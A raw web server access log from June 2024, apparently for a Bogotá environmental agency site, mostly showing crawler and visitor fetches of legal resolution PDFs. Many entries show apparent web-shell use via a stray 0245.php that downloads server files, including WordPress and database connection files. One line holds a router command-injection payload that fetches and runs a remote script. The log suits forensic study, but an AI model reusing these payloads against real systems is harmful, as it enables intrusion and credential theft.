45.77.36.12 - - [23/Jun/2024:07:20:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300&f=00002297.tif&ft=download HTTP/1.1" 200 153236
47.128.55.100 - - [23/Jun/2024:07:20:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=setup-config.php&ft=download HTTP/1.1" 200 13353
216.244.66.195 - - [23/Jun/2024:07:20:48 -0500] "GET /BLA/resoluciones/AUTOS%202024/01359.pdf HTTP/1.1" 200 411363
216.244.66.195 - - [23/Jun/2024:07:21:28 -0500] "GET /BLA/resoluciones/AUTOS%202024/01411.pdf HTTP/1.1" 200 321085
216.244.66.195 - - [23/Jun/2024:07:22:07 -0500] "GET /BLA/resoluciones/AUTOS%202017/02978.pdf HTTP/1.1" 200 275943
52.167.144.140 - - [23/Jun/2024:07:22:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/6400.pdf HTTP/1.1" 304 -
201.245.192.253 - - [23/Jun/2024:07:21:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:07:22:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:07:22:44 -0500] "GET /BLA/resoluciones/AUTOS%202024/01115.pdf HTTP/1.1" 200 579780
216.244.66.195 - - [23/Jun/2024:07:23:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/02048.pdf HTTP/1.1" 200 350405
216.244.66.195 - - [23/Jun/2024:07:24:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3792.pdf HTTP/1.1" 200 435294
167.99.70.135 - - [23/Jun/2024:07:24:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs&f=link.min.js&ft=download HTTP/1.1" 200 1646
216.244.66.195 - - [23/Jun/2024:07:24:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9522.pdf HTTP/1.1" 200 393401
47.128.18.253 - - [23/Jun/2024:07:24:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+301-350&f=00000309.tif&ft=download HTTP/1.1" 200 20131
216.244.66.195 - - [23/Jun/2024:07:25:31 -0500] "GET /galeria/galeria/fotos/Huemdal-Cordoba1G.jpg HTTP/1.1" 200 379768
186.102.27.253 - - [23/Jun/2024:07:25:22 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+Md2XNto6UyJ3Gm9tPrkOOISWHc5ZtuDaGLgWtZB7zerT5z5sjrbeySqgUJdLthPz9kB/7lWe4jQIcDbexExjFHIBw5G+3lIOJwXFK6PAZdVxvAf1oSpjjRn/YFHyhw5Mp1AqUpRsQlrcvGNd9vWhLPb70LJjUjOLoYkMLAcxol2hMqBvNE9R8+gM/NEce+2lcDwyzV2DBbg/+G7Dylsvvqgj9L+j31m6xtn04sgrFYpF0HON7xVKVF5DfO8RhsOH7oDGScjiwFg==&u=U2FsdGVkX18HReYnn9GuapCrBaCwKoF2oi5JuYCXL/gacPxN6uHxNLzvJo9U4iRk&y=U2FsdGVkX1/zik8hH9XHjaE+Svp+8briNhFHzRyzYCiNinrM7v3yZo/Xo8/s0gD5 HTTP/1.1" 503 1124
52.167.144.17 - - [23/Jun/2024:07:26:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20301%20AL%20400/RESOLUCION%200311%20DE%202007.pdf HTTP/1.1" 200 403688
173.252.95.5 - - [23/Jun/2024:07:26:50 -0500] "GET / HTTP/1.1" 200 4720
173.252.95.10 - - [23/Jun/2024:07:26:50 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [23/Jun/2024:07:26:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:07:27:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:07:27:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:07:27:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
66.249.66.20 - - [23/Jun/2024:07:28:36 -0500] "GET /Publicaciones/2023EE135028.pdf HTTP/1.1" 404 228
139.180.209.154 - - [23/Jun/2024:07:28:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cmesa&f=footerold.jpg&ft=download HTTP/1.1" 200 39099
66.249.66.20 - - [23/Jun/2024:07:28:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3113.pdf HTTP/1.1" 200 539623
216.244.66.195 - - [23/Jun/2024:07:28:56 -0500] "GET /BLA/resoluciones/AUTOS%202011/4861.pdf HTTP/1.1" 200 160343
47.128.44.198 - - [23/Jun/2024:07:28:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion-22&f=conexion.php&ft=download HTTP/1.1" 200 656
173.252.127.8 - - [23/Jun/2024:07:29:03 -0500] "GET /humedales-por-que-son-importantes-en-epoca-de-lluvia.html HTTP/1.1" 200 793
216.244.66.195 - - [23/Jun/2024:07:29:29 -0500] "GET /BLA/resoluciones/AUTOS%202011/4971.pdf HTTP/1.1" 200 202644
201.245.192.253 - - [23/Jun/2024:07:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:07:30:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:07:30:06 -0500] "GET /BLA/resoluciones/AUTOS%202011/5198.pdf HTTP/1.1" 200 319375
216.244.66.195 - - [23/Jun/2024:07:30:44 -0500] "GET /BLA/resoluciones/AUTOS%202011/5307.pdf HTTP/1.1" 200 228651
216.244.66.195 - - [23/Jun/2024:07:31:16 -0500] "GET /BLA/resoluciones/AUTOS%202011/5317.pdf HTTP/1.1" 200 280415
216.244.66.195 - - [23/Jun/2024:07:31:50 -0500] "GET /BLA/resoluciones/AUTOS%202011/5537.pdf HTTP/1.1" 200 209378
201.245.192.253 - - [23/Jun/2024:07:31:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:07:32:19 -0500] "GET /BLA/resoluciones/AUTOS%202011/5755.pdf HTTP/1.1" 200 244597
216.245.221.92 - - [23/Jun/2024:07:32:31 -0500] "HEAD / HTTP/1.1" 200 -
159.223.33.228 - - [23/Jun/2024:07:32:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1951-2000&f=00001986.tif&ft=download HTTP/1.1" 200 20132
216.244.66.195 - - [23/Jun/2024:07:32:46 -0500] "GET /BLA/resoluciones/AUTOS%202011/6059.pdf HTTP/1.1" 200 206212
47.128.112.194 - - [23/Jun/2024:07:33:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4514.pdf&ft=download HTTP/1.1" 200 20135
216.244.66.195 - - [23/Jun/2024:07:33:12 -0500] "GET /BLA/resoluciones/AUTOS%202011/6148.pdf HTTP/1.1" 200 216802
216.244.66.195 - - [23/Jun/2024:07:33:42 -0500] "GET /BLA/resoluciones/AUTOS%202011/6256.pdf HTTP/1.1" 200 202367
216.244.66.195 - - [23/Jun/2024:07:34:07 -0500] "GET /BLA/resoluciones/AUTOS%202011/6494.pdf HTTP/1.1" 200 200051
216.244.66.195 - - [23/Jun/2024:07:34:30 -0500] "GET /BLA/resoluciones/AUTOS%202011/6853.pdf HTTP/1.1" 200 1399547
216.244.66.195 - - [23/Jun/2024:07:34:55 -0500] "GET /BLA/resoluciones/AUTOS%202011/7052.pdf HTTP/1.1" 200 1675390
216.244.66.195 - - [23/Jun/2024:07:35:35 -0500] "GET /BLA/resoluciones/AUTOS%202011/7195.pdf HTTP/1.1" 200 348305
216.244.66.195 - - [23/Jun/2024:07:36:06 -0500] "GET /BLA/resoluciones/AUTOS%202011/7235.pdf HTTP/1.1" 200 172075
139.180.154.152 - - [23/Jun/2024:05:56:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2556.pdf&ft=download HTTP/1.1" 200 327335
216.244.66.195 - - [23/Jun/2024:07:36:35 -0500] "GET /BLA/resoluciones/AUTOS%202011/7580.pdf HTTP/1.1" 200 532184
167.99.70.135 - - [23/Jun/2024:07:36:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2642.pdf&ft=download HTTP/1.1" 200 334389
216.244.66.195 - - [23/Jun/2024:07:37:04 -0500] "GET /BLA/resoluciones/AUTOS%202013/3318.pdf HTTP/1.1" 200 195408
201.245.192.253 - - [23/Jun/2024:07:36:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
47.128.22.68 - - [23/Jun/2024:07:37:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5523.pdf&ft=download HTTP/1.1" 200 20134
216.245.221.92 - - [23/Jun/2024:07:37:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:07:37:31 -0500] "GET /BLA/resoluciones/AUTOS%202013/3465.pdf HTTP/1.1" 200 295252
201.245.192.253 - - [23/Jun/2024:07:37:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:07:37:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:07:37:57 -0500] "GET /BLA/resoluciones/AUTOS%202013/3468.pdf HTTP/1.1" 200 300187
216.244.66.195 - - [23/Jun/2024:07:38:22 -0500] "GET /BLA/resoluciones/AUTOS%202013/3559.pdf HTTP/1.1" 200 574572
216.244.66.195 - - [23/Jun/2024:07:38:47 -0500] "GET /BLA/resoluciones/AUTOS%202015/4721.pdf HTTP/1.1" 200 568161
216.244.66.195 - - [23/Jun/2024:07:39:15 -0500] "GET /BLA/resoluciones/AUTOS%202015/5216.pdf HTTP/1.1" 200 570719
216.244.66.195 - - [23/Jun/2024:07:39:41 -0500] "GET /BLA/resoluciones/AUTOS%202015/6298.pdf HTTP/1.1" 200 428061
216.244.66.195 - - [23/Jun/2024:07:40:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/5002.pdf HTTP/1.1" 200 249499
201.245.192.253 - - [23/Jun/2024:07:39:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:07:40:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:07:40:25 -0500] "GET /BLA/resoluciones/AUTOS%202018/5005.pdf HTTP/1.1" 200 253918
167.99.79.53 - - [23/Jun/2024:07:40:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
178.128.212.26 - - [23/Jun/2024:07:40:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
167.99.79.53 - - [23/Jun/2024:07:40:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
178.128.212.26 - - [23/Jun/2024:07:40:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
45.32.114.132 - - [23/Jun/2024:07:40:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150&f=00001111.tif HTTP/1.1" 200 17694
128.199.142.3 - - [23/Jun/2024:07:40:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
167.99.79.53 - - [23/Jun/2024:07:40:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
45.32.114.132 - - [23/Jun/2024:07:40:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
178.128.212.26 - - [23/Jun/2024:07:40:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
149.28.152.164 - - [23/Jun/2024:07:40:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
149.28.152.164 - - [23/Jun/2024:07:40:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
216.244.66.195 - - [23/Jun/2024:07:40:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/6375.pdf HTTP/1.1" 200 414265
114.119.158.113 - - [23/Jun/2024:07:40:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2006/ HTTP/1.1" 200 14291
216.244.66.195 - - [23/Jun/2024:07:41:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/4211.pdf HTTP/1.1" 200 410042
162.55.175.142 - - [23/Jun/2024:07:41:17 -0500] "GET / HTTP/1.1" 200 4720
47.128.43.130 - - [23/Jun/2024:07:41:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=post.php&ft=download HTTP/1.1" 200 8883
201.245.192.253 - - [23/Jun/2024:07:41:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:07:42:31 -0500] "HEAD / HTTP/1.1" 200 -
45.77.246.143 - - [23/Jun/2024:07:44:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2628.pdf HTTP/1.1" 200 2739
66.249.66.20 - - [23/Jun/2024:07:45:36 -0500] "GET /Publicaciones/2024EE67503.pdf HTTP/1.1" 404 227
47.128.112.112 - - [23/Jun/2024:07:45:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050&f=00002048.tif&ft=download HTTP/1.1" 200 20131
201.245.192.253 - - [23/Jun/2024:07:46:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:07:47:31 -0500] "HEAD / HTTP/1.1" 200 -
66.42.55.225 - - [23/Jun/2024:07:48:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1551-1600&f=00001572.tif&ft=download HTTP/1.1" 200 148446
47.128.112.135 - - [23/Jun/2024:07:49:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page89.swf&ft=download HTTP/1.1" 200 26357
173.252.83.26 - - [23/Jun/2024:07:50:40 -0500] "GET /images/01052024%20Nota%20apertura%20senderos%20Cerros.jpeg HTTP/1.1" 200 130671
66.249.66.20 - - [23/Jun/2024:07:51:36 -0500] "GET /Publicaciones/2023EE126083.pdf HTTP/1.1" 404 228
201.245.192.253 - - [23/Jun/2024:07:51:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
46.174.191.29 - - [23/Jun/2024:07:52:12 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [23/Jun/2024:07:52:31 -0500] "HEAD / HTTP/1.1" 200 -
149.28.151.231 - - [23/Jun/2024:06:12:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3483.pdf&ft=download&white=1 HTTP/1.1" 200 421543
165.232.175.90 - - [23/Jun/2024:07:52:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono&f=cambio_climatico_0clip_image004.png&ft=download HTTP/1.1" 200 879
47.128.40.121 - - [23/Jun/2024:07:53:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=menu.php&ft=download&white=1 HTTP/1.1" 200 13625
152.61.192.232 - - [23/Jun/2024:07:54:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?REQUEST=GetCapabilities&SERVICE=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [23/Jun/2024:07:54:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [23/Jun/2024:07:54:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
66.249.66.20 - - [23/Jun/2024:07:54:40 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2512.pdf HTTP/1.1" 304 -
66.249.66.39 - - [23/Jun/2024:07:55:11 -0500] "GET /acercar-programa-del-distrito-para-ayudar-a-las-empresas-a-crecer-de-manera-sostenible.html HTTP/1.1" 200 979
52.15.147.27 - - [23/Jun/2024:07:55:17 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:07:55:37 -0500] "GET /robots.txt HTTP/1.1" 404 1018
139.180.156.80 - - [23/Jun/2024:07:56:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages&f=menu-2x.png&ft=download HTTP/1.1" 200 12672
201.245.192.253 - - [23/Jun/2024:07:56:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:07:57:31 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.7 - - [23/Jun/2024:07:57:42 -0500] "GET /BLA/resoluciones/AUTOS%202022/2744.pdf HTTP/1.1" 200 410966
47.128.18.78 - - [23/Jun/2024:07:58:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6387.pdf&ft=download HTTP/1.1" 200 20135
104.248.153.159 - - [23/Jun/2024:08:00:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=1133+.pdf HTTP/1.1" 200 2742
207.46.13.141 - - [23/Jun/2024:08:01:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/1418.pdf HTTP/1.1" 304 -
185.191.127.212 - - [23/Jun/2024:08:01:39 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [23/Jun/2024:08:01:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
47.128.43.238 - - [23/Jun/2024:08:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=feed-rdf.php&ft=download HTTP/1.1" 200 2640
216.245.221.92 - - [23/Jun/2024:08:02:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [23/Jun/2024:08:03:58 -0500] "GET /Publicaciones/2023EE126676.pdf HTTP/1.1" 404 228
139.180.143.119 - - [23/Jun/2024:08:04:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima&f=wp-signup.php&ft=download HTTP/1.1" 200 25152
66.249.66.21 - - [23/Jun/2024:08:06:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20101%20AL%20200/RESOLUCION%200110%20%20DE%202007.pdf HTTP/1.1" 200 1605474
47.128.18.84 - - [23/Jun/2024:08:06:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=60Segundos_Agosto20.flv&ft=download&white=1 HTTP/1.1" 200 8933015
201.245.192.253 - - [23/Jun/2024:08:06:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:08:07:26 -0500] "GET /BLA/resoluciones/AUTOS%202024/01693.pdf HTTP/1.1" 200 404782
216.245.221.92 - - [23/Jun/2024:08:07:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:08:08:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1831.pdf HTTP/1.1" 200 253430
52.167.144.215 - - [23/Jun/2024:08:08:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1292.pdf HTTP/1.1" 304 -
216.244.66.195 - - [23/Jun/2024:08:08:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2115.pdf HTTP/1.1" 200 282572
216.244.66.195 - - [23/Jun/2024:08:09:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2130.pdf HTTP/1.1" 200 289588
216.244.66.195 - - [23/Jun/2024:08:09:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2709.pdf HTTP/1.1" 200 467698
216.244.66.195 - - [23/Jun/2024:08:10:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2740.pdf HTTP/1.1" 200 702744
47.128.110.180 - - [23/Jun/2024:08:10:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=plugins.php&ft=download HTTP/1.1" 200 20814
216.244.66.195 - - [23/Jun/2024:08:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2747.pdf HTTP/1.1" 200 526238
216.244.66.195 - - [23/Jun/2024:08:11:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2852.zip HTTP/1.1" 200 271509
216.244.66.195 - - [23/Jun/2024:08:12:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2984.pdf HTTP/1.1" 200 266379
201.245.192.253 - - [23/Jun/2024:08:11:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:08:12:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:08:12:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3382.pdf HTTP/1.1" 200 315871
216.244.66.195 - - [23/Jun/2024:08:13:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3446.pdf HTTP/1.1" 200 301853
191.109.165.114 - - [23/Jun/2024:08:12:51 -0500] "GET /appsia/controlador HTTP/1.1" 503 1124
191.109.165.114 - - [23/Jun/2024:08:13:25 -0500] "GET /appsia/controlador HTTP/1.1" 503 1124
216.244.66.195 - - [23/Jun/2024:08:13:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/RESOLUCION%201591%20DE%201997.pdf HTTP/1.1" 200 25476
40.77.167.56 - - [23/Jun/2024:08:13:35 -0500] "GET /Publicaciones/2024EE111764.pdf HTTP/1.1" 404 228
216.244.66.195 - - [23/Jun/2024:08:13:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/RESOLUCION%20970%20DE%201997.pdf HTTP/1.1" 200 311506
216.244.66.195 - - [23/Jun/2024:08:14:14 -0500] "GET /BLA/resoluciones/AUTOS%202007/0070.pdf HTTP/1.1" 200 177441
216.244.66.195 - - [23/Jun/2024:08:14:38 -0500] "GET /BLA/resoluciones/AUTOS%202007/0153.pdf HTTP/1.1" 200 408653
47.128.125.75 - - [23/Jun/2024:08:14:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800&f=00001771.tif&ft=download HTTP/1.1" 200 137330
185.224.128.43 - - [23/Jun/2024:08:14:51 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [23/Jun/2024:08:15:16 -0500] "GET /BLA/resoluciones/AUTOS%202007/0244.pdf HTTP/1.1" 200 16753
216.244.66.195 - - [23/Jun/2024:08:15:46 -0500] "GET /BLA/resoluciones/AUTOS%202007/0415.pdf HTTP/1.1" 200 59347
216.244.66.195 - - [23/Jun/2024:08:16:15 -0500] "GET /BLA/resoluciones/AUTOS%202007/0457.pdf HTTP/1.1" 200 17301
128.199.220.119 - - [23/Jun/2024:08:16:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3132.pdf&ft=download HTTP/1.1" 200 411832
216.244.66.195 - - [23/Jun/2024:08:16:42 -0500] "GET /BLA/resoluciones/AUTOS%202007/0491.pdf HTTP/1.1" 200 15863
201.245.192.253 - - [23/Jun/2024:08:16:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:08:17:09 -0500] "GET /BLA/resoluciones/AUTOS%202007/0609.pdf HTTP/1.1" 200 131296
207.46.13.102 - - [23/Jun/2024:08:17:29 -0500] "GET /el-bienestar-de-las-familias-sera-el-tema-central-del-distrito-en-el-mes-de-mayo-bajo-el-lema-nos-movemos-por-las-familias-bogotaavanzaenfamilia.html HTTP/1.1" 200 1139
216.245.221.92 - - [23/Jun/2024:08:17:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:08:17:35 -0500] "GET /BLA/resoluciones/AUTOS%202007/0716.pdf HTTP/1.1" 200 110576
201.245.192.253 - - [23/Jun/2024:08:17:38 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:08:17:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:08:18:01 -0500] "GET /BLA/resoluciones/AUTOS%202007/0929.pdf HTTP/1.1" 200 76440
66.249.66.21 - - [23/Jun/2024:08:18:27 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 304 -
216.244.66.195 - - [23/Jun/2024:08:18:29 -0500] "GET /BLA/resoluciones/AUTOS%202007/0993.pdf HTTP/1.1" 200 25011
216.244.66.195 - - [23/Jun/2024:08:18:52 -0500] "GET /BLA/resoluciones/AUTOS%202007/1053.pdf HTTP/1.1" 200 21756
47.128.96.172 - - [23/Jun/2024:08:18:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400&f=00002396.tif&ft=download HTTP/1.1" 200 97955
216.244.66.195 - - [23/Jun/2024:08:19:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0970.pdf HTTP/1.1" 200 6731126
201.245.192.253 - - [23/Jun/2024:08:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:08:20:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
66.249.66.38 - - [23/Jun/2024:08:20:11 -0500] "GET /por-obras-del-metro-de-bogota-en-la-av-caracas-secretaria-de-ambiente-recomienda-a-la-ciudadania-realizar-los-tramites-a-traves-de-sus-canales-virtuales.html HTTP/1.1" 200 1270
216.244.66.195 - - [23/Jun/2024:08:20:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/00235.pdf HTTP/1.1" 200 386751
40.77.167.56 - - [23/Jun/2024:08:20:28 -0500] "GET /BLA/resoluciones/AUTOS%202014/2110.pdf HTTP/1.1" 200 965112
216.244.66.195 - - [23/Jun/2024:08:20:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7815.pdf HTTP/1.1" 200 500663
